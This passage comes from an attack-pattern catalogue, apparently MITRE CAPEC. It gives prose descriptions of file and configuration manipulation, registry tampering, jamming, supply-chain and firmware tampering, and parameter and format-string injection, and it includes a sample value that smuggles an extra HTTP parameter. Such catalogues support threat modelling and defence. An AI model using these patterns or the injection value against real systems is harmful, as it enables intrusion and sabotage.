An adversary modifies file contents by adding data to files for several reasons. Many different attacks could “follow” this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 572 (Artificially Inflate File Sizes) > 655 (Avoid Security Tool Identification by Adding Data)

An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions. In addition to this, adding data to a file also changes the file's hash, frustrating security tools that look for known bad files by their hash.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 635 (Alternative Execution Due to Deceptive Filenames)

The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 635 (Alternative Execution Due to Deceptive Filenames) > 11 (Cause Web Server Misclassification)

An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 635 (Alternative Execution Due to Deceptive Filenames) > 649 (Adding a Space to a File Extension)

An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 636 (Hiding Malicious Data or Code within Files)

Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 636 (Hiding Malicious Data or Code within Files) > 168 (Windows ::DATA Alternate Data Stream)

An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple "files" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 636 (Hiding Malicious Data or Code within Files) > 35 (Leverage Executable Code in Non-Executable Files)

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 165 (File Manipulation) > 73 (User-Controlled Filename)

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation)

An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application's ability to use them would constitute a configuration/environment manipulation attack.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 203 (Manipulate Registry Information)

An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 203 (Manipulate Registry Information) > 270 (Modification of Registry Run Keys)

An adversary adds a new entry to the "run keys" in the Windows registry so that an application of their choosing is executed when a user logs in. In this way, the adversary can get their executable to operate and run on the target system with the authorized user's level of permissions. This attack is a good way for an adversary to run persistent spyware on a user's machine, such as a keylogger.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 203 (Manipulate Registry Information) > 478 (Modification of Windows Service Configuration)

An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 203 (Manipulate Registry Information) > 51 (Poison Web Service Registry)

SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 271 (Schema Poisoning)

An adversary corrupts or modifies the content of a schema for the purpose of undermining the security of the target. Schemas provide the structure and content definitions for resources used by an application. By replacing or modifying a schema, the adversary can affect how the application handles or interprets a resource, often leading to possible denial of service, entering into an unexpected state, or recording incomplete data.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 271 (Schema Poisoning) > 146 (XML Schema Poisoning)

An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 536 (Data Injected During Configuration)

An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 578 (Disable Security Software)

An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 176 (Configuration/Environment Manipulation) > 75 (Manipulating Writeable Configuration Files)

Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction)

An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or cause the system to stop working as intended. This can cause the system components to be unavailable until the obstruction mitigated.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 547 (Physical Destruction of Device or Component)

An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 582 (Route Disabling)

An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an "Internet kill switch" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 582 (Route Disabling) > 583 (Disabling Network Hardware)

In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 582 (Route Disabling) > 584 (BGP Route Disabling)

An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 582 (Route Disabling) > 585 (DNS Domain Seizure)

In this attack pattern, an adversary influences a target's web-hosting company to disable a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 601 (Jamming)

An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 601 (Jamming) > 559 (Orbital Jamming)

In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 601 (Jamming) > 604 (Wi-Fi Jamming)

In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack – for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 601 (Jamming) > 605 (Cellular Jamming)

In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 603 (Blockage)

An adversary blocks the delivery of an important system resource causing the system to fail or stop working.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 603 (Blockage) > 589 (DNS Blocking)

An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 603 (Blockage) > 590 (IP Address Blocking)

An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 607 (Obstruction) > 603 (Blockage) > 96 (Block Access to Libraries)

An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture)

An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration)

An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system's software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 206 (Signing Malicious Code)

The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer's key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim's computer. This differs from CAPEC-673, because the adversary is performing the code signing.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 443 (Malicious Logic Inserted Into Product by Authorized Developer)

An adversary uses their privileged position within an authorized development organization to inject malicious logic into a codebase or product.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 445 (Malicious Logic Insertion into Product Software via Configuration Management Manipulation)

An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 446 (Malicious Logic Insertion into Product via Inclusion of Third-Party Component)

An adversary conducts supply chain attacks by the inclusion of insecure third-party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 511 (Infiltration of Software Development Environment)

An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 516 (Hardware Component Substitution During Baselining)

An adversary with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component during the product development and research phases. This can lead to adjustments and calibrations being made in the product so that when the final product, now containing the modified component, is deployed it will not perform as designed and be advantageous to the adversary.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 520 (Counterfeit Hardware Component Inserted During Product Assembly)

An adversary with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 532 (Altered Installed BIOS)

An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 537 (Infiltration of Hardware Development Environment)

An adversary, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 538 (Open-Source Library Manipulation)

Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 539 (ASIC With Malicious Functionality)

An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 670 (Software Development Tools Maliciously Altered)

An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 672 (Malicious Code Implanted During Chip Programming)

During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 673 (Developer Signing Maliciously Altered Software)

Software produced by a reputable developer is clandestinely infected with malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems. This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 444 (Development Alteration) > 678 (System Build Data Maliciously Altered)

During the system build process, the system is deliberately misconfigured by the alteration of the build data. Access to system configuration data files and build processes is susceptible to deliberate misconfiguration of the system.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration)

An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration) > 517 (Documentation Alteration to Circumvent Dial-down)

An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration) > 518 (Documentation Alteration to Produce Under-performing Systems)

An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration) > 519 (Documentation Alteration to Cause Errors in System Design)

An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration) > 521 (Hardware Design Specifications Are Altered)

An attacker with access to a manufacturer's hardware manufacturing process documentation alters the design specifications, which introduces flaws advantageous to the attacker once the system is deployed.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration) > 671 (Requirements for ASIC Functionality Maliciously Altered)

An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user’s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 438 (Modification During Manufacture) > 447 (Design Alteration) > 674 (Design for FPGA Maliciously Altered)

An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 439 (Manipulation During Distribution)

An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 439 (Manipulation During Distribution) > 522 (Malicious Hardware Component Replacement)

An adversary replaces legitimate hardware in the system with faulty counterfeit or tampered hardware in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 439 (Manipulation During Distribution) > 523 (Malicious Software Implanted)

An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 439 (Manipulation During Distribution) > 524 (Rogue Integration Procedures)

An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion)

An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 442 (Infected Software)

An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 442 (Infected Software) > 448 (Embed Virus into DLL)

An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 452 (Infected Hardware)

An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 452 (Infected Hardware) > 638 (Altered Component Firmware)

An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component's Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 456 (Infected Memory)

An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 456 (Infected Memory) > 457 (USB Memory Attacks)

An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 441 (Malicious Logic Insertion) > 456 (Infected Memory) > 458 (Flash Memory Attacks)

An adversary inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device.

1000 (Mechanisms of Attack) > 262 (Manipulate System Resources) > 548 (Contaminate Resource)

An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. When this happens, the contaminated information system, device, or network must be brought offline to investigate and mitigate the data spill, which denies availability of the system until the investigation is complete.Data Spill

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items)

Attack patterns within this category focus on the ability to control or disrupt the behavior of a target either through crafted data submitted via an interface for data input, or the installation and execution of malicious code on the target system. The former happens when an adversary adds material to their input that is interpreted by the application causing the targeted application to perform steps unintended by the application manager or causing the application to enter an unstable state. Attacks of this type differ from Data Structure Attacks in that the latter attacks subvert the underlying structures that hold user-provided data, either pre-empting interpretation of the input (in the case of Buffer Overflows) or resulting in values that the targeted application is unable to handle correctly (in the case of Integer Overflows). In Injection attacks, the input is interpreted by the application, but the attacker has included instructions to the interpreting functions that the target application then follows.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection)

An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value "myInput&new_param=myValue", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 134 (Email Injection)

An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 134 (Email Injection) > 41 (Using Meta-characters in E-mail Headers to Inject Malicious Payloads)

This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 135 (Format String Injection)

An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 135 (Format String Injection) > 67 (String Format Overflow in syslog())

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 138 (Reflection Injection)

An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.

1000 (Mechanisms of Attack) > 152 (Inject Unexpected Items) > 137 (Parameter Injection) > 15 (Command Delimiters)

